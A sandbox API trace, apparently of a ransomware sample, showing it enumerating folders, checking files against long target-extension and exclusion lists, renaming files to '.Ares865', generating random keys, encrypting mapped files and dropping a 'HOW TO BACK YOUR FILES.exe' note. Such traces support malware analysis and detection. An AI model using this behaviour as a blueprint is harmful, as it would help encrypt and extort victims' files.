[0065.592] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0065.592] lstrlenW (lpString="vis") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0065.592] lstrlenW (lpString="vpd") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0065.592] lstrlenW (lpString="vvv") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0065.592] lstrlenW (lpString="wdb") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0065.592] lstrlenW (lpString="wmdb") returned 4 [0065.592] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0065.592] lstrlenW (lpString="wrk") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0065.592] lstrlenW (lpString="xdb") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0065.592] lstrlenW (lpString="xld") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0065.592] lstrlenW (lpString="xmlff") returned 5 [0065.592] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0065.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\desktop.ini.Ares865") returned 76 [0065.593] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0065.594] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.594] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0065.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.595] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.595] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.595] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.596] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a0, lpName=0x0) returned 0x118 [0065.599] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a0) returned 0x190000 [0065.600] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.601] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.601] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.601] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.601] CloseHandle (hObject=0x118) returned 1 [0065.601] CloseHandle (hObject=0x164) returned 1 [0065.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.602] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4acc4f40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.602] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.602] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x661a180, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd021fb60, ftLastWriteTime.dwHighDateTime=0x1cb892e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="aoldtz.exe") returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2=".") returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="..") returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="windows") returned -1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="bootmgr") returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="temp") returned -1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="pagefile.sys") returned -1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="boot") returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="ids.txt") returned 1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="perflogs") returned -1 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2="MSBuild") returned -1 [0065.602] lstrlenW (lpString="index.dat") returned 9 [0065.602] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\desktop.ini") returned 68 [0065.602] lstrcpyW (in: lpString1=0x2cce472, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0065.602] lstrlenW (lpString="index.dat") returned 9 [0065.602] lstrlenW (lpString="Ares865") returned 7 [0065.602] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0065.602] lstrlenW (lpString=".dll") returned 4 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2=".dll") returned 1 [0065.602] lstrlenW (lpString=".lnk") returned 4 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2=".lnk") returned 1 [0065.602] lstrlenW (lpString=".ini") returned 4 [0065.602] lstrcmpiW (lpString1="index.dat", lpString2=".ini") returned 1 [0065.603] lstrlenW (lpString=".sys") returned 4 [0065.603] lstrcmpiW (lpString1="index.dat", lpString2=".sys") returned 1 [0065.603] lstrlenW (lpString="index.dat") returned 9 [0065.603] lstrlenW (lpString="bak") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0065.603] lstrlenW (lpString="ba_") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0065.603] lstrlenW (lpString="dbb") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0065.603] lstrlenW (lpString="vmdk") returned 4 [0065.603] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0065.603] lstrlenW (lpString="rar") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0065.603] lstrlenW (lpString="zip") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0065.603] lstrlenW (lpString="tgz") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0065.603] lstrlenW (lpString="vbox") returned 4 [0065.603] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0065.603] lstrlenW (lpString="vdi") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0065.603] lstrlenW (lpString="vhd") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0065.603] lstrlenW (lpString="vhdx") returned 4 [0065.603] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0065.603] lstrlenW (lpString="avhd") returned 4 [0065.603] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0065.603] lstrlenW (lpString="db") returned 2 [0065.603] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0065.603] lstrlenW (lpString="db2") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0065.603] lstrlenW (lpString="db3") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0065.603] lstrlenW (lpString="dbf") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0065.603] lstrlenW (lpString="mdf") returned 3 [0065.603] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0065.604] lstrlenW (lpString="mdb") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0065.604] lstrlenW (lpString="sql") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0065.604] lstrlenW (lpString="sqlite") returned 6 [0065.604] lstrcmpiW (lpString1="ex.dat", lpString2="sqlite") returned -1 [0065.604] lstrlenW (lpString="sqlite3") returned 7 [0065.604] lstrcmpiW (lpString1="dex.dat", lpString2="sqlite3") returned -1 [0065.604] lstrlenW (lpString="sqlitedb") returned 8 [0065.604] lstrcmpiW (lpString1="ndex.dat", lpString2="sqlitedb") returned -1 [0065.604] lstrlenW (lpString="xml") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0065.604] lstrlenW (lpString="$er") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0065.604] lstrlenW (lpString="4dd") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0065.604] lstrlenW (lpString="4dl") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0065.604] lstrlenW (lpString="^^^") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0065.604] lstrlenW (lpString="abs") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0065.604] lstrlenW (lpString="abx") returned 3 [0065.604] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0065.604] lstrlenW (lpString="accdb") returned 5 [0065.604] lstrcmpiW (lpString1="x.dat", lpString2="accdb") returned 1 [0065.604] lstrlenW (lpString="accdc") returned 5 [0065.604] lstrcmpiW (lpString1="x.dat", lpString2="accdc") returned 1 [0065.604] lstrlenW (lpString="accde") returned 5 [0065.604] lstrcmpiW (lpString1="x.dat", lpString2="accde") returned 1 [0065.604] lstrlenW (lpString="accdr") returned 5 [0065.604] lstrcmpiW (lpString1="x.dat", lpString2="accdr") returned 1 [0065.604] lstrlenW (lpString="accdt") returned 5 [0065.604] lstrcmpiW (lpString1="x.dat", lpString2="accdt") returned 1 [0065.604] lstrlenW (lpString="accdw") returned 5 [0065.604] lstrcmpiW (lpString1="x.dat", lpString2="accdw") returned 1 [0065.604] lstrlenW (lpString="accft") returned 5 [0065.605] lstrcmpiW (lpString1="x.dat", lpString2="accft") returned 1 [0065.605] lstrlenW (lpString="adb") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0065.605] lstrlenW (lpString="adb") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0065.605] lstrlenW (lpString="ade") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0065.605] lstrlenW (lpString="adf") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0065.605] lstrlenW (lpString="adn") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0065.605] lstrlenW (lpString="adp") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0065.605] lstrlenW (lpString="alf") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0065.605] lstrlenW (lpString="ask") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0065.605] lstrlenW (lpString="btr") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0065.605] lstrlenW (lpString="cat") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0065.605] lstrlenW (lpString="cdb") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0065.605] lstrlenW (lpString="ckp") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0065.605] lstrlenW (lpString="cma") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0065.605] lstrlenW (lpString="cpd") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0065.605] lstrlenW (lpString="dacpac") returned 6 [0065.605] lstrcmpiW (lpString1="ex.dat", lpString2="dacpac") returned 1 [0065.605] lstrlenW (lpString="dad") returned 3 [0065.605] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0065.605] lstrlenW (lpString="dadiagrams") returned 10 [0065.605] lstrlenW (lpString="daschema") returned 8 [0065.605] lstrcmpiW (lpString1="ndex.dat", lpString2="daschema") returned 1 [0065.606] lstrlenW (lpString="db-journal") returned 10 [0065.606] lstrlenW (lpString="db-shm") returned 6 [0065.606] lstrcmpiW (lpString1="ex.dat", lpString2="db-shm") returned 1 [0065.606] lstrlenW (lpString="db-wal") returned 6 [0065.606] lstrcmpiW (lpString1="ex.dat", lpString2="db-wal") returned 1 [0065.606] lstrlenW (lpString="dbc") returned 3 [0065.606] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0065.606] lstrlenW (lpString="dbs") returned 3 [0065.606] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0065.606] lstrlenW (lpString="dbt") returned 3 [0065.606] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0065.606] lstrlenW (lpString="dbv") returned 3 [0065.606] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0065.606] lstrlenW (lpString="dbx") returned 3 [0065.606] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0065.606] lstrlenW (lpString="dcb") returned 3 [0065.606] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0065.606] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\index.dat.Ares865") returned 74 [0065.606] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 1 [0065.608] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.609] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0065.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.609] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.610] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.610] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.610] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x118 [0065.611] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x190000 [0065.618] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.619] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.619] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.619] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.619] CloseHandle (hObject=0x118) returned 1 [0065.619] CloseHandle (hObject=0x164) returned 1 [0065.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.620] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x661a180, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd021fb60, ftLastWriteTime.dwHighDateTime=0x1cb892e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0065.620] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.620] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0065.620] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data" [0065.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0065.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0065.620] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data") returned 53 [0065.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data" [0065.620] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.620] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.621] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.621] GetLastError () returned 0x0 [0065.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.621] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.621] CloseHandle (hObject=0x12c) returned 1 [0065.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.621] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.621] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.621] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.621] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.622] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.622] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.622] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.622] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.622] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.622] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.622] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="aoldtz.exe") returned 1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="temp") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="ntuser.dat") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="perflogs") returned -1 [0065.622] lstrcmpiW (lpString1="Application Data", lpString2="MSBuild") returned -1 [0065.622] lstrlenW (lpString="Application Data") returned 16 [0065.622] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\*") returned 55 [0065.622] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0065.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0065.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2c8f28 [0065.622] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b30 [0065.622] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 